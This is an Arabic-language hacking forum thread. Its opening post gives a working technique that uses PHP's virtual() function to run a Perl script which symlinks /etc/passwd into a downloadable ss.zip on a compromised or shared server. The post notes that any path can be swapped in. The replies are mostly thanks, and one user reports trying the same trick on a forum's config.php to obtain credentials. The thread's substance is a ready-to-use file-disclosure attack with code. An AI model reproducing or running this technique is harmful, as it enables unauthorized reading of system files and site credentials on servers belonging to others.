[حصريآ]تشغيل البيرل بأحد دوال php

[S4udi h4ck]

السلام عليكم ورحمة الله وبركاته

كيف الحال ياعيال إن شاء الله بخير ...

دالة virtual

هالطريقه نادر اللي يعرفها ويمكن محد فكر فيها و الطريقه من اكتشافي و استنتاجي

طبعاً راح نشغل البيرل ليس مثل ملف cgi-telnet او اي شيل ثاني بالبيرل

هالدالة تشغل اي كود بيرل يطبع امر ماء على الصفحة وهو طبعاً يستفاد بالسيرفر لتنسيق html

لأصحاب تطوير المواقع و برمجة السكربتات ونادر بالمره انك تلقى سيرفرات حاطه الدالة من ضمن

الدوال الغير مفعله ...

راح اعطيكم كود تضعونه بملف بيرل


كود PHP:

                           #!/usr/bin/perl -w 


$target="/etc/passwd";   


$distension ="ss.zip";  


print "Content-type: ****/html\n\n"; 


print '<**** ****="#C0C0C0" bgcolor="#000000">'; 


$symlink = symlink($target,$distension); 


if($symlink == 1) { print " $distension Symlink Created Successfully . . ."; }  


else { print "Cannot Symlink File or File $distension Already Exists

. . ."; }




زي ماهو مبين بكود البيرل أنه راح ينشىء اختصار عن طريق Symlink

لملف /etc/passwd بملف اسمه ss.zip

ترفعه على السيرفر وطبعاً اعطاءه تصريح 755 وعطيناه اسم ss.pl

وتنشأ ملف php بإستخدام دالة virtual

كود PHP:
<?php


virtual("./ss.pl");


?>

ارفع ملف الـ php على نفس مسار ملف البيرل

وافتحه من المتصفح وراح يجيك نفس اللي بهالصوره

راح يقول

ss.zip Symlink Created Successfully

حمل ملف ss.zip وافتحه عن طريق المفكره (Notepad) وراح تلقى محتوى /etc/passwd

الملف في المرافقه

بإمكانك تغير المسار إلى اي مسار اخر تبي تقرأه على السيرفر ...

و أيضاً تستطيع إستعمال دوال اخرى للبيرل ...

و إن شاء الله يكون الشرح مفهوم للجميع ..

أهداء الي منظمة : kala$nikoV
smilies15

و بالتوفيق ...
G0D-FaTH3R
​

 

[KaLa$nikoV]

مشكور ع الشرح الرائع

من بعد اذنك اسمح لي باضافه


(الشرح هو تخطي عباره عن عمليه سحب ملفات ع السيرفر من خلال
دوال لغه perl )

شكرا ع الاهداء والشرح

++ تقيم

 

[z3r0 b0mb3r]

مشكورررررررررررررررررررررررررررررررر أخي بارك الله فيك
لك مني أجمل تحية

 

[H3x HaCkeR]

]يعطيك العافيه

 

[معاني الفراق]

يابطل واصل مجهودك

 

[Xa7m3d]

مشكور يالغالي وتم التجربة بنجاح لكن اخي اسمحلي اصحح العنوان لانو مفهوم الفكرة لا ينطبق ع العنوان بمعنى مش انك تشغل البيرل نفسه من خلال هالدالة فقط هو انك تسحب ملفات من السرفر لايمكن قرائته وهده شغلة يمكن نستفيد منها احيانا مشكور مجدداا وبالتوفيق للجميع

 

[Multi_Hacker]

مشكووور اخوي

لا تحرمنا من ابداعك

اخوك Multi_Hacker

 

[Net-B0x]

مشكور جزاك الله خيرا

 

[hack!n9]

الف مشكوور يا غالي عل كل شيا

 

[cisco_security]

شكرا لك يا غالي

 

[دحمان39]

جزاك الله الفردوس الاعلى

 

[GNGR1]

يعطيك العافيه يا خلفهم

 

[Th3 M4RoC4in GhOsT]

مشكور اخي الغالي حبيت أسالك سؤال يعني حطيت بدل امر etc/passwd
امر نسخ ln بعدين حطيت مسار الكونفق هيك
ln /home/xxx/public_html/vb/includes/config.php
لكن للاسف طلع خطأ
ياريت لو عندك افادة الله يجازيك كل خير

 

[عصام-محمد]

بارك الله فيكم

 

[Dr.jmjmah]

مششششكورَ , والله مبـــدع وكلمة مبـدع قليله فيك
ولاهنت علىآ الشششرح الـوـواضضضح ,
وسسلمت يدك علىآ هيـك موضوع مميزَ

 

[Gx1Sniper]

بارك الله فيك على الشرح اخوي

تقبل مروري

 

[soufhak]

شكرا أحي الغالي هي دالة أخت لل include() و require() لكن هذه الدوال تستعمل لصفحات php , هذه virtual تستعمل للسكربتات و هي دالة منادات

شكرا أخي الكريم و يعطيك العافية على ها الفكرة الحلوة

 

[D4RK H4CK]

كفوووووووو يا سعودي هاك !!

 

[dh_merdel]

الله يعافيك ^_^

 

[ReD-HaT]

[align=center]شـكــ وبارك الله فيك ـــرا لك[/align]